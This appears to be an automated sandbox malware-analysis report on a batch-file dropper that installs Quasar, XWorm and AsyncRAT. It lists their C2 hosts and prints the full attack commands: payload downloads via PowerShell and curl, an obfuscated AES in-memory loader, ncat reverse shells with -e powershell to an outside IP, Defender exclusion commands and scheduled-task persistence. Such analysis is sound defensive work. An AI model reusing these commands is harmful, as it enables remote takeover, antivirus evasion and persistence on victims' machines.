Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
02-07-2024 22:41
General
-
Target
4Xc1zTf.bat
-
Size
313B
-
MD5
83b90daf2dc1611ccacd57f90a9e7dcd
-
SHA1
bcc229dcfe50608ada43b87105e423f88deb09f3
-
SHA256
3598bd743d78bb85de33127f0584f9d37d0775fa5166b721b153deeeea0c172b
-
SHA512
1aadf9c3cf7e540e09929bb9b834af192d9edc7196c6e44e4d77f8df2d26404509381306bcbd405d86dd47df403a375220b097aa7fd05162422c1dd594df3778
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
reconnect_delay
3000
Extracted
Family
xworm
C2
super-nearest.gl.at.ply.gg:17835
best-bird.gl.at.ply.gg:27196
wiz.bounceme.net:6000
aes.plain
Extracted
Family
asyncrat
Botnet
Default
C2
finally-grande.gl.at.ply.gg:25844
Attributes
-
delay
1
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
stop-largely.gl.at.ply.gg:27116
Mutex
$Sxr-kl1r656AGsPQksTmi8
Attributes
-
encryption_key
CjDCAPF1JiLswgFipef3
-
install_name
$77Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Start-Up Application
-
subdirectory
$77
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Detect Xworm Payload 5 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 3 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Powershell Invoke Web Request.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 18 IoCs
-
Loads dropped DLL 30 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4Xc1zTf.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/ReaImastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat -OutFile libuac.dll.bat"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -o libuca.dll.bat https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/dasdsa/Loader.bat3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_249_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8OtTMs/npLYOIBYlfG/OTBN6FeVwAUDUGxfjA+29aJM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kpp156hrLYj8cw8zv2pEoA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SJXNG=New-Object System.IO.MemoryStream(,$param_var); $sgoZX=New-Object System.IO.MemoryStream; $dynjl=New-Object System.IO.Compression.GZipStream($SJXNG, [IO.Compression.CompressionMode]::Decompress); $dynjl.CopyTo($sgoZX); $dynjl.Dispose(); $SJXNG.Dispose(); $sgoZX.Dispose(); $sgoZX.ToArray();}function execute_function($param_var,$param2_var){ $UGanP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KjkSu=$UGanP.EntryPoint; $KjkSu.Invoke($null, $param2_var);}$tkMkx = 'C:\Users\Admin\AppData\Roaming\Windows_Log_249.bat';$host.UI.RawUI.WindowTitle = $tkMkx;$qEPqg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tkMkx).Split([Environment]::NewLine);foreach ($rIcAS in $qEPqg) { if ($rIcAS.StartsWith('ChJbrTJEBszqYyljGNnq')) { $eAywj=$rIcAS.Substring(20); break; }}$payloads_var=[string[]]$eAywj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zip.exe"C:\Users\Admin\AppData\Local\Temp\7zip.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\wininit.exe"C:\Users\Admin\AppData\Local\Temp\wininit.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows Start-Up Application" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"C:\Users\Admin\AppData\Local\Temp\WinRunner.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\$TMP~.bat"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qyndhi.bat" "7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RSqfgbsxY4tQviMhgruGlA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTJVo=New-Object System.IO.MemoryStream(,$param_var); $OVEZJ=New-Object System.IO.MemoryStream; $xpowC=New-Object System.IO.Compression.GZipStream($mTJVo, [IO.Compression.CompressionMode]::Decompress); $xpowC.CopyTo($OVEZJ); $xpowC.Dispose(); $mTJVo.Dispose(); $OVEZJ.Dispose(); $OVEZJ.ToArray();}function execute_function($param_var,$param2_var){ $aXdmE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $plyTG=$aXdmE.EntryPoint; $plyTG.Invoke($null, $param2_var);}$DUACE = 'C:\Users\Admin\AppData\Local\Temp\qyndhi.bat';$host.UI.RawUI.WindowTitle = $DUACE;$NSEOn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DUACE).Split([Environment]::NewLine);foreach ($fxoWu in $NSEOn) { if ($fxoWu.StartsWith('WopmnYnvzYwvYHEKXXam')) { $rQXdu=$fxoWu.Substring(20); break; }}$payloads_var=[string[]]$rQXdu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"9⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5fefc3c2e8b3bc905d96dc7ce2d0eaad3
SHA1debd9cb93c1801c881ae20ffe67d65d12e1cf8c3
SHA256b59a972429f6f91b9a3c3f3951101d6675543d2932ba1fe1e463dc8799486002
SHA51296ded891c94bff4a24771dfa8d2ea17c2fee73e580f35f43c93e68a5ef8665ef3ce26441652c5253c21bd18a144d8b313dcd5679ee879031703b3a609d6c35c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
